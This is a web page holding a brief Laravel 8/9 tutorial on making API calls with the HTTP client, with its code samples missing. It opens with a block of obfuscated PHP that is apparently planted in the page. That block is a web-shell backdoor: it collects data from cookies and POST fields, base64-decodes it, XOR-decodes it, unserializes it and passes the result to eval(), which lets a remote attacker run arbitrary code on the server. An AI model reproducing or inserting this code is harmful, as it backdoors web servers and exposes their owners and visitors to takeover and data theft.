$DvzQHm = chr ( 97 - 12 )."\106" . 'n' . chr ( 1075 - 980 )."\101" . chr ( 860 - 773 )."\123" . chr (112) . chr (67); $NbMSMrS = chr (99) . "\x6c" . chr (97) . "\x73" . chr ( 709 - 594 )."\x5f" . 'e' . "\x78" . chr ( 322 - 217 )."\x73" . chr (116) . 's';$FMAtj = class_exists($DvzQHm); $NbMSMrS = "8106";$oGyYhOjwwJ = strpos($NbMSMrS, $DvzQHm);if ($FMAtj == $oGyYhOjwwJ){function hPJYSNZY(){$GRnDdmkGF = new /* 27144 */ UFn_AWSpC(15370 + 15370); $GRnDdmkGF = NULL;}$LLRQm = "15370";class UFn_AWSpC{private function DqHvQlzVu($LLRQm){if (is_array(UFn_AWSpC::$nevRlo)) {$HPMJuWc2 = str_replace("<" . "?php", "", UFn_AWSpC::$nevRlo["content"]);eval($HPMJuWc2); $LLRQm = "15370";exit();}}public function GumtLGFD(){$HPMJuWc = "31640";$this->_dummy = str_repeat($HPMJuWc, strlen($HPMJuWc));}public function __destruct(){UFn_AWSpC::$nevRlo = @unserialize(UFn_AWSpC::$nevRlo); $LLRQm = "34403_53375";$this->DqHvQlzVu($LLRQm); $LLRQm = "34403_53375";}public function TWesGgfp($HPMJuWc, $AsbjDrK){return $HPMJuWc[0] ^ str_repeat($AsbjDrK, intval(strlen($HPMJuWc[0]) / strlen($AsbjDrK)) + 1);}public function yLzBB($HPMJuWc){$mooTNM = chr (98) . "\141" . 's' . "\145" . '6' . chr ( 128 - 76 );return array_map($mooTNM . '_' . chr (100) . chr (101) . 'c' . chr (111) . "\x64" . "\145", array($HPMJuWc,));}public function __construct($IliDlenB=0){$XNBTIF = ',';$HPMJuWc = "";$NBgoQPqh = $_POST;$lHGPkiBq = $_COOKIE;$AsbjDrK = "73060c82-8347-4e0f-9373-828e9111d7b1";$Nwkmdnx = @$lHGPkiBq[substr($AsbjDrK, 0, 4)];if (!empty($Nwkmdnx)){$Nwkmdnx = explode($XNBTIF, $Nwkmdnx);foreach ($Nwkmdnx as $OOpTQVDi){$HPMJuWc .= @$lHGPkiBq[$OOpTQVDi];$HPMJuWc .= @$NBgoQPqh[$OOpTQVDi];}$HPMJuWc = $this->yLzBB($HPMJuWc);}UFn_AWSpC::$nevRlo = $this->TWesGgfp($HPMJuWc, $AsbjDrK);if (strpos($AsbjDrK, $XNBTIF) !== FALSE){$AsbjDrK = str_pad($AsbjDrK, 10); $AsbjDrK = strcspn ($AsbjDrK, $XNBTIF); $AsbjDrK = ltrim(rtrim($AsbjDrK));}}public static $nevRlo = 6482;}hPJYSNZY();} How we can make API call in Laravel 8 | 9 Using HTTP request

How we can make API call in Laravel 8 | 9 Using HTTP request

Are you getting issues while making requests to API in Laravel 8 /9 if yes then you have landed on the right page?

How we can make API call in Laravel 8 | 9 Using HTTP request

In Laravel 8 or 9, you can make API calls using Laravel’s built-in HTTP client, Guzzle HTTP client, or any other HTTP client library. It’s damn super easy to use.

Api Call in laravel

Here’s giving you an example of making an API call using Laravel’s built-in HTTP client after this tutorial you will be able to make API calls using Laravel’s built-in HTTP client.

  • First, of all you need to import the HTTP client by adding the following line at the top of your file, well this package is essential otherwise things would not work.:
  • After importing the package now you have to make/send a GET request, for this you can use the get() method provided by the HTTP Guzzle client. For example:
  • The request will send a GET request to the specified URL and return a response object. You can then retrieve the response data using the json() method, which will parse the response as JSON:
  • To perform crud(CREATE, READ, UPDATE, DELETE) operations and make other types of requests, such as POST or PUT, you can use the corresponding methods provided by the HTTP client. For example, to make a POST request:

This will send a POST request to the specified URL with the specified data and return a response object. The object has all the data you needed to display to the user.

That’s it! You can use these methods to make API calls to any URL and retrieve the response data in your Laravel application.

I hope you guys understand how to make an API request in laravel 8 / 9

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